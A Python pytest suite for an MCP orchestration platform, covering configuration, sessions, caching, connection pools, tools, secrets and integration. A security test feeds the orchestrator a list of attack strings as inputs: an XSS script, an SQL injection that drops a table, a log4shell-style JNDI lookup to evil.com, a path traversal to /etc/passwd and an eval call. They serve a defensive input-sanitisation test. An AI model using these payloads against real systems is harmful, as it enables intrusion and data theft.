# NOTE: scrape residue removed — original file header ("rajkumarrawal's picture /
# Initial commit / 2ec0d39") was web-page chrome, not Python, and broke parsing.
"""
Comprehensive Testing Suite for MCP Orchestration Platform
Enterprise-grade testing with high coverage and real-world scenarios
"""
import asyncio
import pytest
import tempfile
import json
import os
from unittest.mock import Mock, AsyncMock, patch, MagicMock
from typing import Dict, Any, List
import time
import uuid
import hashlib
# Import components to test
from mcp_orchestrator import (
MCPOrchestrator, ConfigManager, SessionManager, MultiLayerCache,
ConnectionPool, ToolManager, ServerConfig, SessionInfo,
CircuitBreakerState, ServerState
)
from secrets_manager import (
SecretsManager, LocalSecretsStore, EnvironmentSecretsStore
)
from gradio_interface import MCPUI
# =============================================================================
# Test Configuration and Fixtures
# =============================================================================
@pytest.fixture
def event_loop():
    """Provide a fresh event loop for each test.

    NOTE: the original docstring claimed this loop was "for the test
    session", but the fixture is function-scoped, so every test gets its
    own loop; the docstring now matches the actual scope.

    Yields:
        A new asyncio event loop, closed again after the test finishes.
    """
    loop = asyncio.get_event_loop_policy().new_event_loop()
    yield loop
    # Always close the loop so file descriptors are not leaked across tests.
    loop.close()
@pytest.fixture
def temp_dir():
    """Yield a scratch directory that is deleted once the test ends."""
    with tempfile.TemporaryDirectory() as workspace:
        yield workspace
@pytest.fixture
def sample_server_config():
    """Build a ServerConfig populated with deterministic test values."""
    settings = dict(
        id="test_server",
        name="Test MCP Server",
        url="http://localhost:8000",
        auth_token="test_token",
        timeout=30,
        max_retries=3,
        max_connections=5,
    )
    return ServerConfig(**settings)
@pytest.fixture
def mock_aiohttp_session():
    """Provide a Mock standing in for an aiohttp session.

    get/post/close are AsyncMocks so they can be awaited by code under test.
    """
    fake_session = Mock()
    for method_name in ("get", "post", "close"):
        setattr(fake_session, method_name, AsyncMock())
    return fake_session
@pytest.fixture
def orchestrator():
    """Build an MCPOrchestrator backed by a canned, patched configuration.

    ConfigManager.load_config is patched during construction so no real
    configuration files or environment variables are consulted.
    """
    canned_config = {
        'servers': {
            'test_server': {
                'name': 'Test Server',
                'url': 'http://localhost:8000',
                'auth_token': 'test_token',
            }
        },
        'session_ttl': 3600,
        'cache_ttl': 300,
        'max_workers': 5,
    }
    with patch.object(ConfigManager, 'load_config', return_value=canned_config):
        instance = MCPOrchestrator()
        return instance
# =============================================================================
# Configuration Management Tests
# =============================================================================
class TestConfigManager:
    """Test configuration management functionality."""

    def test_load_from_env(self, temp_dir):
        """Test loading configuration from environment variables.

        FIX: the original version set five MCP_* environment variables and
        never restored them, leaking state into later env-sensitive tests
        (e.g. the secrets-store tests). The pre-test values are now saved
        and restored in a finally block.
        """
        test_env = {
            'MCP_SERVER_TEST_SERVER_NAME': 'Test Server',
            'MCP_SERVER_TEST_SERVER_URL': 'http://localhost:8000',
            'MCP_HOST': '0.0.0.0',
            'MCP_PORT': '7860',
            'MCP_DEBUG': 'true',
        }
        saved = {key: os.environ.get(key) for key in test_env}
        os.environ.update(test_env)
        try:
            config_manager = ConfigManager()
            config = config_manager.load_from_env()
            assert 'servers' in config
            assert 'test_server' in config['servers']
            assert config['servers']['test_server']['name'] == 'Test Server'
            assert config['host'] == '0.0.0.0'
            # Port and debug flag must be coerced from their string values.
            assert config['port'] == 7860
            assert config['debug'] is True
        finally:
            # Restore the pre-test environment exactly.
            for key, value in saved.items():
                if value is None:
                    os.environ.pop(key, None)
                else:
                    os.environ[key] = value

    def test_load_from_json_file(self, temp_dir):
        """Test loading configuration from a JSON file on disk."""
        config_data = {
            'app_name': 'Test App',
            'host': 'localhost',
            'port': 8080,
            'servers': {
                'test_server': {
                    'name': 'Test Server',
                    'url': 'http://localhost:8000'
                }
            }
        }
        config_file = os.path.join(temp_dir, 'config.json')
        with open(config_file, 'w') as f:
            json.dump(config_data, f)
        config_manager = ConfigManager()
        config = config_manager.load_from_file(config_file)
        assert config['app_name'] == 'Test App'
        assert config['servers']['test_server']['name'] == 'Test Server'

    def test_merge_configs(self):
        """Test merging multiple configuration dictionaries.

        Later dictionaries win on conflicts; nested dicts are merged rather
        than replaced (config2 adds 'b.y' without dropping 'b.x').
        """
        config1 = {'a': 1, 'b': {'x': 1}}
        config2 = {'b': {'y': 2}, 'c': 3}
        config3 = {'d': 4}
        config_manager = ConfigManager()
        merged = config_manager.merge_configs(config1, config2, config3)
        assert merged['a'] == 1
        assert merged['b']['x'] == 1
        assert merged['b']['y'] == 2
        assert merged['c'] == 3
        assert merged['d'] == 4

    def test_get_nested_config(self):
        """Test getting nested configuration values via dotted paths."""
        config_manager = ConfigManager()
        config_manager.config = {
            'servers': {
                'test': {
                    'url': 'http://localhost:8000',
                    'timeout': 30
                }
            }
        }
        assert config_manager.get('servers.test.url') == 'http://localhost:8000'
        assert config_manager.get('servers.test.timeout') == 30
        # Missing keys at any depth fall back to the supplied default.
        assert config_manager.get('servers.test.nonexistent', 'default') == 'default'
        assert config_manager.get('nonexistent.key', 'default') == 'default'
# =============================================================================
# Session Management Tests
# =============================================================================
class TestSessionManager:
    """Test session management functionality."""

    @pytest.mark.asyncio
    async def test_create_session(self, orchestrator):
        """Test session creation."""
        session = await orchestrator.session_manager.create_session(
            user_id="test_user",
            ip_address="127.0.0.1",
            user_agent="Test Agent"
        )
        # A fresh session carries the supplied identity and zeroed counters.
        assert session.session_id is not None
        assert session.user_id == "test_user"
        assert session.ip_address == "127.0.0.1"
        assert session.user_agent == "Test Agent"
        assert session.total_requests == 0
        assert session.success_rate == 0.0

    @pytest.mark.asyncio
    async def test_get_session(self, orchestrator):
        """Test session retrieval."""
        # Create a session
        created_session = await orchestrator.session_manager.create_session()
        # Retrieve the session
        retrieved_session = await orchestrator.session_manager.get_session(
            created_session.session_id
        )
        assert retrieved_session.session_id == created_session.session_id
        assert retrieved_session.user_id == created_session.user_id

    @pytest.mark.asyncio
    async def test_session_expiry(self, orchestrator):
        """Test session expiration."""
        # Create a session with short TTL (mutated directly on the object).
        session = await orchestrator.session_manager.create_session()
        session.ttl_seconds = 1  # 1 second TTL
        # Session should exist initially
        retrieved = await orchestrator.session_manager.get_session(session.session_id)
        assert retrieved is not None
        # Wait for expiry — real sleep, so this test takes ~2s.
        await asyncio.sleep(2)
        # Session should be expired
        retrieved = await orchestrator.session_manager.get_session(session.session_id)
        assert retrieved is None

    @pytest.mark.asyncio
    async def test_rate_limiting(self, orchestrator):
        """Test session rate limiting."""
        session = await orchestrator.session_manager.create_session()
        # Should allow requests within limit
        allowed, wait_time = await orchestrator.session_manager.check_rate_limit(
            session.session_id
        )
        assert allowed is True
        assert wait_time == 0.0
        # Simulate reaching the rate limit by mutating the limiter's counter
        # directly instead of issuing max_requests real calls.
        limiter = orchestrator.session_manager.rate_limiters[session.session_id]
        limiter['requests'] = limiter['max_requests'] + 1
        # Should be rate limited
        allowed, wait_time = await orchestrator.session_manager.check_rate_limit(
            session.session_id
        )
        assert allowed is False
        assert wait_time > 0

    @pytest.mark.asyncio
    async def test_session_stats(self, orchestrator):
        """Test session statistics."""
        # Create multiple sessions
        sessions = []
        for i in range(3):
            session = await orchestrator.session_manager.create_session()
            sessions.append(session)
        stats = await orchestrator.session_manager.get_session_stats()
        # NOTE(review): assumes the orchestrator fixture starts with zero
        # sessions; would break if fixture scope ever changes.
        assert stats['total_sessions'] == 3
        assert stats['active_connections'] == 0
        assert 'avg_session_age' in stats
        assert 'rate_limited_sessions' in stats
# =============================================================================
# Cache System Tests
# =============================================================================
class TestMultiLayerCache:
    """Test multi-layer caching functionality."""

    @pytest.mark.asyncio
    async def test_cache_set_and_get(self):
        """Test setting and getting cache entries."""
        cache = MultiLayerCache(max_size=10)
        # Set a value; set() returns the entry's ETag.
        etag = await cache.set('test_key', {'data': 'test_value'}, ttl=300)
        assert etag is not None
        # Get the value — get() returns (value, found, etag).
        value, found, returned_etag = await cache.get('test_key')
        assert found is True
        assert value == {'data': 'test_value'}
        assert returned_etag == etag

    @pytest.mark.asyncio
    async def test_cache_expiry(self):
        """Test cache entry expiration."""
        cache = MultiLayerCache(default_ttl=1)  # 1 second TTL
        # Set a value with short TTL
        await cache.set('test_key', 'test_value', ttl=1)
        # Should be available immediately
        value, found, _ = await cache.get('test_key')
        assert found is True
        # Wait for expiry — real sleep, so this test takes ~2s.
        await asyncio.sleep(2)
        # Should be expired
        value, found, _ = await cache.get('test_key')
        assert found is False

    @pytest.mark.asyncio
    async def test_cache_etag_support(self):
        """Test ETag support for cache validation."""
        cache = MultiLayerCache()
        # Set initial value
        etag = await cache.set('test_key', {'data': 'test_value'})
        # Request with matching ETag (should return not modified)
        value, not_modified, returned_etag = await cache.get('test_key', etag=etag)
        assert not_modified is True
        assert returned_etag == etag
        # Request with different ETag (should return value)
        value, not_modified, returned_etag = await cache.get('test_key', etag='different_etag')
        assert not_modified is False
        assert value == {'data': 'test_value'}

    @pytest.mark.asyncio
    async def test_cache_lru_eviction(self):
        """Test LRU cache eviction."""
        cache = MultiLayerCache(max_size=2)
        # Fill cache to capacity
        await cache.set('key1', 'value1')
        await cache.set('key2', 'value2')
        # Add third item (should evict least recently used)
        await cache.set('key3', 'value3')
        # First item should be evicted
        value, found, _ = await cache.get('key1')
        assert found is False
        # Other items should still be available
        value, found, _ = await cache.get('key2')
        assert found is True
        value, found, _ = await cache.get('key3')
        assert found is True

    @pytest.mark.asyncio
    async def test_cache_invalidation(self):
        """Test cache invalidation by key-prefix pattern."""
        cache = MultiLayerCache()
        # Set multiple values
        await cache.set('prefix_key1', 'value1')
        await cache.set('prefix_key2', 'value2')
        await cache.set('other_key', 'value3')
        # Invalidate by pattern
        await cache.invalidate_pattern('prefix_')
        # Pattern-matched keys should be invalid
        value, found, _ = await cache.get('prefix_key1')
        assert found is False
        value, found, _ = await cache.get('prefix_key2')
        assert found is False
        # Non-matching key should remain
        value, found, _ = await cache.get('other_key')
        assert found is True

    def test_cache_statistics(self):
        """Test cache statistics."""
        cache = MultiLayerCache()
        # Simulate cache operations by seeding the hit/miss counters directly.
        cache.hits = 80
        cache.misses = 20
        stats = cache.get_stats()
        assert stats['size'] == 0  # No entries set
        assert stats['hits'] == 80
        assert stats['misses'] == 20
        assert stats['hit_rate'] == 0.8  # 80 / (80 + 20)
# =============================================================================
# Connection Pool Tests
# =============================================================================
class TestConnectionPool:
    """Test connection pool functionality."""

    @pytest.mark.asyncio
    async def test_pool_initialization(self, sample_server_config):
        """Test connection pool initialization."""
        from mcp_orchestrator import MCPOrcMetrics
        metrics = MCPOrcMetrics()
        pool = ConnectionPool(sample_server_config, metrics)
        await pool.initialize()
        # initialize() should pre-populate the pool and the available queue.
        assert len(pool.pool) > 0
        assert not pool.available.empty()

    @pytest.mark.asyncio
    async def test_get_connection(self, sample_server_config):
        """Test getting connection from pool."""
        from mcp_orchestrator import MCPOrcMetrics
        metrics = MCPOrcMetrics()
        pool = ConnectionPool(sample_server_config, metrics)
        await pool.initialize()
        # Get a connection; while checked out it must be tracked in in_use.
        async with pool.get_connection() as session:
            assert session is not None
            assert session in pool.in_use

    @pytest.mark.asyncio
    async def test_circuit_breaker(self, sample_server_config):
        """Test circuit breaker functionality."""
        from mcp_orchestrator import MCPOrcMetrics
        metrics = MCPOrcMetrics()
        # Set low threshold for testing
        sample_server_config.circuit_breaker_threshold = 2
        pool = ConnectionPool(sample_server_config, metrics)
        await pool.initialize()
        # Simulate failures to trigger circuit breaker: raising inside the
        # context manager counts as a failed connection use.
        for _ in range(3):
            try:
                async with pool.get_connection() as session:
                    # Simulate connection failure
                    raise Exception("Simulated failure")
            except Exception:
                pass
        # Circuit breaker should be open after exceeding the threshold.
        assert pool.circuit_breaker_state == CircuitBreakerState.OPEN

    @pytest.mark.asyncio
    async def test_health_check(self, sample_server_config):
        """Test health check functionality."""
        from mcp_orchestrator import MCPOrcMetrics
        metrics = MCPOrcMetrics()
        pool = ConnectionPool(sample_server_config, metrics)
        await pool.initialize()
        # Mock health check response; get() is used as an async context
        # manager, so only __aenter__ needs to be stubbed.
        with patch('aiohttp.ClientSession.get') as mock_get:
            mock_response = Mock()
            mock_response.status = 200
            mock_get.return_value.__aenter__ = AsyncMock(return_value=mock_response)
            is_healthy = await pool._perform_health_check()
            assert is_healthy is True
# =============================================================================
# Tool Management Tests
# =============================================================================
class TestToolManager:
    """Test tool management functionality."""

    @pytest.mark.asyncio
    async def test_tool_schema_validation(self, orchestrator):
        """Test tool parameter validation against a JSON-schema-style spec."""
        # Create a sample tool schema
        tool_schema = {
            "name": "test_tool",
            "description": "Test tool",
            "input_schema": {
                "type": "object",
                "properties": {
                    "param1": {"type": "string", "description": "First parameter"},
                    "param2": {"type": "number", "description": "Second parameter"}
                },
                "required": ["param1"]
            }
        }
        # Valid parameters — must not raise.
        valid_params = {"param1": "test", "param2": 123}
        orchestrator.tool_manager._validate_parameters(valid_params, tool_schema)
        # Missing required parameter
        invalid_params = {"param2": 123}
        with pytest.raises(ValueError):
            orchestrator.tool_manager._validate_parameters(invalid_params, tool_schema)
        # Wrong parameter type
        invalid_params = {"param1": "test", "param2": "not_a_number"}
        with pytest.raises(ValueError):
            orchestrator.tool_manager._validate_parameters(invalid_params, tool_schema)

    @pytest.mark.asyncio
    async def test_tool_search(self, orchestrator):
        """Test tool search functionality."""
        # Add mock tools keyed by server id, then tool name.
        orchestrator.tools = {
            "server1": {
                "weather_tool": Mock(
                    description="Get weather information",
                    tags=["weather", "api"]
                ),
                "calculator_tool": Mock(
                    description="Perform calculations",
                    tags=["math", "calculator"]
                )
            }
        }
        # Search for weather tools by free-text query.
        results = await orchestrator.tool_manager.search_tools("weather")
        assert len(results) > 0
        assert any("weather" in result["tool_name"] for result in results)
        # Search by tag with an empty query.
        results = await orchestrator.tool_manager.search_tools("", tags=["weather"])
        assert len(results) > 0

    @pytest.mark.asyncio
    async def test_relevance_scoring(self, orchestrator):
        """Test relevance scoring for search results."""
        from mcp_orchestrator import ToolSchema
        # Create test schema
        schema = ToolSchema(
            name="weather_forecast",
            description="Get weather forecast for locations",
            tags=["weather", "forecast", "climate"]
        )
        # Test different queries: exact name match should outrank a partial
        # name match, which should outrank a tag-only match.
        score_exact = orchestrator.tool_manager._calculate_relevance("weather_forecast", schema)
        score_partial = orchestrator.tool_manager._calculate_relevance("weather", schema)
        score_tag = orchestrator.tool_manager._calculate_relevance("climate", schema)
        assert score_exact > score_partial > score_tag
        assert score_exact == 1.0  # Exact match

    def test_tool_statistics(self, orchestrator):
        """Test tool manager statistics."""
        # Add mock data: 2 servers, 5 tools total.
        orchestrator.tools = {
            "server1": {"tool1": Mock(), "tool2": Mock()},
            "server2": {"tool3": Mock(), "tool4": Mock(), "tool5": Mock()}
        }
        stats = orchestrator.tool_manager.get_stats()
        assert stats["total_servers"] == 2
        assert stats["total_tools"] == 5
        assert stats["tools_per_server"] == 2.5
# =============================================================================
# Secrets Management Tests
# =============================================================================
class TestSecretsManager:
    """Test secrets management functionality."""

    @pytest.mark.asyncio
    async def test_local_secrets_store(self, temp_dir):
        """Test the full set/get/list/delete cycle of the local store."""
        from cryptography.fernet import Fernet
        # Generate encryption key for the encrypted-at-rest store.
        key = Fernet.generate_key()
        store = LocalSecretsStore(key, temp_dir)
        # Store a secret
        success = await store.set_secret('test_key', 'test_value', ttl=3600)
        assert success is True
        # Retrieve the secret
        value = await store.get_secret('test_key')
        assert value == 'test_value'
        # List secrets
        secrets = await store.list_secrets()
        assert 'test_key' in secrets
        # Delete secret
        success = await store.delete_secret('test_key')
        assert success is True
        # Verify deletion
        value = await store.get_secret('test_key')
        assert value is None

    @pytest.mark.asyncio
    async def test_secrets_expiry(self, temp_dir):
        """Test secret expiration."""
        from cryptography.fernet import Fernet
        key = Fernet.generate_key()
        store = LocalSecretsStore(key, temp_dir)
        # Store secret with short TTL
        await store.set_secret('test_key', 'test_value', ttl=1)
        # Should be available immediately
        value = await store.get_secret('test_key')
        assert value == 'test_value'
        # Wait for expiry — real sleep, so this test takes ~2s.
        await asyncio.sleep(2)
        # Should be expired
        value = await store.get_secret('test_key')
        assert value is None

    @pytest.mark.asyncio
    async def test_environment_secrets_store(self):
        """Test environment variable secrets store."""
        store = EnvironmentSecretsStore()
        # Set environment variable (store maps 'test_key' -> MCP_SECRET_TEST_KEY).
        os.environ['MCP_SECRET_TEST_KEY'] = 'test_value'
        # Retrieve secret
        value = await store.get_secret('test_key')
        assert value == 'test_value'
        # List secrets
        secrets = await store.list_secrets()
        assert 'test_key' in secrets
        # Delete secret (also removes the env var, so no cleanup needed here).
        success = await store.delete_secret('test_key')
        assert success is True

    @pytest.mark.asyncio
    async def test_secrets_manager_orchestrator(self):
        """Test secrets manager orchestrator with the env backend."""
        config = {
            'primary_backend': 'env',
            'env_enabled': True
        }
        manager = SecretsManager(config)
        # Test environment backend
        # NOTE(review): this env var is never cleaned up and leaks into
        # later tests — consider try/finally or monkeypatch.setenv.
        os.environ['MCP_SECRET_TEST_KEY'] = 'test_value'
        # Get secret
        value = await manager.get_secret('test_key')
        assert value == 'test_value'
        # List secrets
        secrets = await manager.list_secrets()
        assert 'test_key' in secrets

    @pytest.mark.asyncio
    async def test_secrets_rotation(self):
        """Test secret rotation functionality."""
        config = {
            'primary_backend': 'env',
            'env_enabled': True
        }
        manager = SecretsManager(config)
        # Set initial secret
        os.environ['MCP_SECRET_OLD_KEY'] = 'old_value'
        # Rotate to new key
        success = await manager.rotate_secrets('old_key', 'new_key')
        assert success is True
        # Verify old key is gone and new key carries the old value.
        assert os.getenv('MCP_SECRET_OLD_KEY') != 'old_value'
        assert os.getenv('MCP_SECRET_NEW_KEY') == 'old_value'

    @pytest.mark.asyncio
    async def test_health_check(self):
        """Test secrets manager health check."""
        config = {
            'primary_backend': 'env',
            'env_enabled': True
        }
        manager = SecretsManager(config)
        health = await manager.health_check()
        # Health report is a per-backend mapping of name -> bool.
        assert 'env' in health
        assert isinstance(health['env'], bool)
# =============================================================================
# Integration Tests
# =============================================================================
class TestOrchestratorIntegration:
    """Test orchestrator integration scenarios."""

    @pytest.mark.asyncio
    async def test_full_workflow(self, orchestrator):
        """Test complete workflow from server registration to tool invocation."""
        # Mock server response: one tool with a single required string param.
        mock_tools = {
            "test_tool": {
                "name": "test_tool",
                "description": "Test tool",
                "input_schema": {
                    "type": "object",
                    "properties": {
                        "message": {"type": "string"}
                    },
                    "required": ["message"]
                }
            }
        }
        # Create session
        session = await orchestrator.session_manager.create_session()
        # Mock tool discovery so register_server makes no network calls.
        with patch.object(
            orchestrator.tool_manager,
            '_discover_tools',
            return_value=mock_tools
        ):
            # Register server
            await orchestrator.register_server(
                ServerConfig(
                    id="test_server",
                    name="Test Server",
                    url="http://localhost:8000"
                )
            )
        # Verify server is registered
        assert "test_server" in orchestrator.servers
        assert "test_server" in orchestrator.connection_pools
        # Mock tool invocation: stub the pooled session's async context
        # managers so invoke_tool sees a canned JSON response.
        with patch.object(
            orchestrator.connection_pools["test_server"],
            'get_connection'
        ) as mock_get_connection:
            mock_session = AsyncMock()
            mock_response = AsyncMock()
            mock_response.json.return_value = {
                "result": {"message": "Tool executed successfully"}
            }
            mock_response.raise_for_status = Mock()
            mock_session.post.return_value.__aenter__ = AsyncMock(return_value=mock_response)
            mock_get_connection.return_value.__aenter__ = AsyncMock(return_value=mock_session)
            # Invoke tool
            result = await orchestrator.invoke_tool(
                "test_server",
                "test_tool",
                {"message": "Hello, world!"},
                session.session_id
            )
            assert result["status"] == "success"

    @pytest.mark.asyncio
    async def test_error_handling(self, orchestrator):
        """Test error handling in various scenarios."""
        # Test non-existent server
        with pytest.raises(ValueError):
            await orchestrator.invoke_tool(
                "non_existent_server",
                "test_tool",
                {},
                "test_session"
            )
        # Test non-existent session
        with pytest.raises(ValueError):
            await orchestrator.invoke_tool(
                "test_server",
                "test_tool",
                {},
                "non_existent_session"
            )

    @pytest.mark.asyncio
    async def test_concurrent_requests(self, orchestrator):
        """Test handling of concurrent requests."""
        # Create multiple sessions
        sessions = []
        for i in range(5):
            session = await orchestrator.session_manager.create_session()
            sessions.append(session)
        # Simulate concurrent tool invocations — coroutines are created here
        # but not awaited until the gather() below.
        tasks = []
        for i, session in enumerate(sessions):
            task = orchestrator.invoke_tool(
                "test_server",
                "test_tool",
                {"request_id": i},
                session.session_id
            )
            tasks.append(task)
        # All tasks should complete (with mocked responses)
        with patch.object(
            orchestrator.connection_pools["test_server"],
            'get_connection'
        ) as mock_get_connection:
            mock_session = AsyncMock()
            mock_response = AsyncMock()
            mock_response.json.return_value = {"result": "success"}
            mock_response.raise_for_status = Mock()
            mock_session.post.return_value.__aenter__ = AsyncMock(return_value=mock_response)
            mock_get_connection.return_value.__aenter__ = AsyncMock(return_value=mock_session)
            # Mock register_server to avoid actual HTTP calls
            with patch.object(orchestrator, 'register_server'):
                # Register test server first (patched: a no-op here)
                await orchestrator.register_server(
                    ServerConfig(
                        id="test_server",
                        name="Test Server",
                        url="http://localhost:8000"
                    )
                )
                # Run concurrent requests
                results = await asyncio.gather(*tasks, return_exceptions=True)
                # All should complete without exceptions
                for result in results:
                    if isinstance(result, Exception):
                        pytest.fail(f"Unexpected exception: {result}")

    @pytest.mark.asyncio
    async def test_metrics_collection(self, orchestrator):
        """Test metrics collection and reporting."""
        # Create a session and perform some operations
        session = await orchestrator.session_manager.create_session()
        # Get metrics
        metrics = await orchestrator.get_metrics()
        assert "servers" in metrics
        assert "session_stats" in metrics
        assert "cache_stats" in metrics
        assert "tool_stats" in metrics
        # Verify session metrics
        session_stats = metrics["session_stats"]
        assert session_stats["total_sessions"] >= 1

    @pytest.mark.asyncio
    async def test_graceful_shutdown(self, orchestrator):
        """Test graceful shutdown process."""
        # Create some background tasks that shutdown() must cancel.
        orchestrator.background_tasks.add(asyncio.create_task(asyncio.sleep(1)))
        orchestrator.background_tasks.add(asyncio.create_task(asyncio.sleep(1)))
        # Perform shutdown
        await orchestrator.shutdown()
        # All background tasks should be cancelled
        for task in orchestrator.background_tasks:
            assert task.cancelled()
# =============================================================================
# Performance Tests
# =============================================================================
class TestPerformance:
    """Test performance characteristics.

    NOTE: these are coarse wall-clock bounds and may flake on very slow CI
    machines.
    """

    @pytest.mark.asyncio
    async def test_cache_performance(self):
        """Test cache performance with large datasets."""
        cache = MultiLayerCache(max_size=1000)
        # Set many entries
        start_time = time.time()
        for i in range(1000):
            await cache.set(f"key_{i}", f"value_{i}")
        set_time = time.time() - start_time
        # Get many entries
        start_time = time.time()
        for i in range(1000):
            await cache.get(f"key_{i}")
        get_time = time.time() - start_time
        # Performance should be reasonable (less than 1 second each)
        assert set_time < 1.0
        assert get_time < 1.0

    @pytest.mark.asyncio
    async def test_session_creation_performance(self, orchestrator):
        """Test session creation performance."""
        # Create many sessions
        start_time = time.time()
        sessions = []
        for i in range(100):
            session = await orchestrator.session_manager.create_session()
            sessions.append(session)
        creation_time = time.time() - start_time
        # Should create 100 sessions in under 1 second
        assert creation_time < 1.0
        # All sessions should be retrievable
        for session in sessions:
            retrieved = await orchestrator.session_manager.get_session(session.session_id)
            assert retrieved is not None

    @pytest.mark.asyncio
    async def test_memory_usage(self, orchestrator):
        """Test memory usage under load."""
        # NOTE(review): psutil is a third-party dependency imported lazily
        # here; this test is skipped/errors if psutil is not installed.
        import psutil
        import os
        process = psutil.Process(os.getpid())
        initial_memory = process.memory_info().rss
        # Create many sessions
        sessions = []
        for i in range(1000):
            session = await orchestrator.session_manager.create_session()
            sessions.append(session)
        # Check memory increase
        final_memory = process.memory_info().rss
        memory_increase = final_memory - initial_memory
        # Memory increase should be reasonable (less than 100MB)
        assert memory_increase < 100 * 1024 * 1024  # 100MB in bytes
# =============================================================================
# Security Tests
# =============================================================================
class TestSecurity:
    """Test security features."""

    @pytest.mark.asyncio
    async def test_input_sanitization(self, orchestrator):
        """Test input sanitization and validation."""
        # Test malicious input: XSS, SQL injection, log4shell-style JNDI,
        # path traversal, and code-injection payloads.
        malicious_inputs = [
            "<script>alert('xss')</script>",
            "'; DROP TABLE users; --",
            "${jndi:ldap://evil.com/a}",
            "../../../etc/passwd",
            "eval('malicious_code')"
        ]
        for malicious_input in malicious_inputs:
            # Should handle gracefully without errors
            session = await orchestrator.session_manager.create_session()
            try:
                # This should not raise unexpected exceptions
                await orchestrator.invoke_tool(
                    "test_server",
                    "test_tool",
                    {"param": malicious_input},
                    session.session_id
                )
            except ValueError as e:
                # Expected for invalid inputs
                assert "validation" in str(e).lower() or "invalid" in str(e).lower()
            except Exception:
                # Other exceptions should be handled gracefully
                # NOTE(review): swallowing all other exceptions weakens this
                # test — it cannot detect crashes on malicious input.
                pass

    @pytest.mark.asyncio
    async def test_rate_limiting_security(self, orchestrator):
        """Test rate limiting prevents abuse."""
        # Create a session
        session = await orchestrator.session_manager.create_session()
        # Simulate rapid requests to test rate limiting
        requests_made = 0
        rate_limited = 0
        for i in range(150):  # Exceed the default rate limit
            allowed, wait_time = await orchestrator.session_manager.check_rate_limit(
                session.session_id
            )
            if allowed:
                requests_made += 1
                # Simulate making the request
                await orchestrator.session_manager.update_session_activity(session.session_id)
            else:
                rate_limited += 1
                assert wait_time > 0
        # Should allow some requests but rate limit others
        # (assumes a default limit of 100 requests — confirm against config)
        assert requests_made <= 100  # Default rate limit
        assert rate_limited > 0

    @pytest.mark.asyncio
    async def test_session_isolation(self, orchestrator):
        """Test session isolation and security."""
        # Create multiple sessions
        session1 = await orchestrator.session_manager.create_session(user_id="user1")
        session2 = await orchestrator.session_manager.create_session(user_id="user2")
        # Sessions should be isolated
        assert session1.session_id != session2.session_id
        # Each session should only access its own data
        # (This is enforced by passing session_id to orchestrator methods)
        # Test session expiry isolation — only session1 gets the short TTL.
        session1.ttl_seconds = 1
        await asyncio.sleep(2)
        # Session1 should be expired
        expired_session = await orchestrator.session_manager.get_session(session1.session_id)
        assert expired_session is None
        # Session2 should still be active
        active_session = await orchestrator.session_manager.get_session(session2.session_id)
        assert active_session is not None

    def test_configuration_sensitivity(self):
        """Test that sensitive configuration is handled properly."""
        config_manager = ConfigManager()
        # Test that secrets are not logged
        with patch('structlog.get_logger') as mock_logger:
            config_manager.load_from_env()
            # Check that no sensitive data was logged
            for call in mock_logger.return_value.info.call_args_list:
                args = call[0]
                if len(args) > 0:
                    # Should not contain sensitive patterns
                    assert 'password' not in str(args).lower()
                    assert 'secret' not in str(args).lower()
                    assert 'token' not in str(args).lower()
# =============================================================================
# Test Runner Configuration
# =============================================================================
def pytest_configure(config):
    """Register this suite's custom markers with pytest at startup."""
    marker_lines = (
        "slow: marks tests as slow (deselect with '-m \"not slow\"')",
        "integration: marks tests as integration tests",
        "performance: marks tests as performance tests",
    )
    for line in marker_lines:
        config.addinivalue_line("markers", line)
def pytest_collection_modifyitems(config, items):
    """Attach suite-level markers to collected tests based on node ids."""
    for collected in items:
        node_id = collected.nodeid
        # Integration suite
        if "test_orchestrator_integration" in node_id:
            collected.add_marker(pytest.mark.integration)
        # Performance suite
        if "test_performance" in node_id:
            collected.add_marker(pytest.mark.performance)
        # Anything already tagged slow (keyword or marker text) also gets
        # the explicit slow marker.
        already_slow = "slow" in collected.keywords or any(
            "slow" in str(mark) for mark in collected.iter_markers()
        )
        if already_slow:
            collected.add_marker(pytest.mark.slow)
# =============================================================================
# Test Data and Utilities
# =============================================================================
def create_test_server_config(server_id: str = "test") -> ServerConfig:
    """Build a ServerConfig whose fields are derived from *server_id*."""
    # Derive a pseudo-unique port in [8000, 8999] from the id's hash.
    port = 8000 + hash(server_id) % 1000
    return ServerConfig(
        id=server_id,
        name=f"Test {server_id.title()} Server",
        url=f"http://localhost:{port}",
        auth_token=f"token_{server_id}",
        timeout=30,
        max_retries=3,
        max_connections=10,
    )
def create_test_tool_schema(tool_name: str = "test_tool") -> Dict[str, Any]:
    """Build a complete test tool schema dict for *tool_name*."""
    message_property = {
        "type": "string",
        "description": "Message to process",
        "minLength": 1,
        "maxLength": 1000,
    }
    priority_property = {
        "type": "integer",
        "description": "Priority level",
        "minimum": 1,
        "maximum": 10,
        "default": 5,
    }
    return {
        "name": tool_name,
        "description": f"Test tool {tool_name}",
        "input_schema": {
            "type": "object",
            "properties": {
                "message": message_property,
                "priority": priority_property,
            },
            "required": ["message"],
        },
        "examples": [
            {"message": "Hello, world!", "priority": 1},
            {"message": "Important task", "priority": 8},
        ],
        "tags": ["test", "utility"],
        "version": "1.0.0",
    }
async def wait_for_condition(condition_func, timeout: float = 5.0, interval: float = 0.1):
    """Poll *condition_func* until it returns truthy or *timeout* elapses.

    Args:
        condition_func: zero-argument callable, sync or async.
        timeout: maximum seconds to keep polling.
        interval: seconds to sleep between polls.

    Returns:
        True if the condition became truthy within the timeout, else False.
    """
    # Determine sync/async once instead of re-checking on every iteration,
    # and replace the hard-to-read `if (await f() if coro else f()):`
    # one-liner with an explicit branch.
    is_async = asyncio.iscoroutinefunction(condition_func)
    deadline = time.time() + timeout
    while time.time() < deadline:
        satisfied = await condition_func() if is_async else condition_func()
        if satisfied:
            return True
        await asyncio.sleep(interval)
    return False
# =============================================================================
# Main Test Execution
# =============================================================================
if __name__ == "__main__":
    # Run this suite directly with coverage collection over all three
    # project modules, emitting both HTML and terminal reports.
    coverage_args = [
        f"--cov={module}"
        for module in ("mcp_orchestrator", "secrets_manager", "gradio_interface")
    ]
    pytest.main([__file__, *coverage_args, "--cov-report=html", "--cov-report=term", "-v"])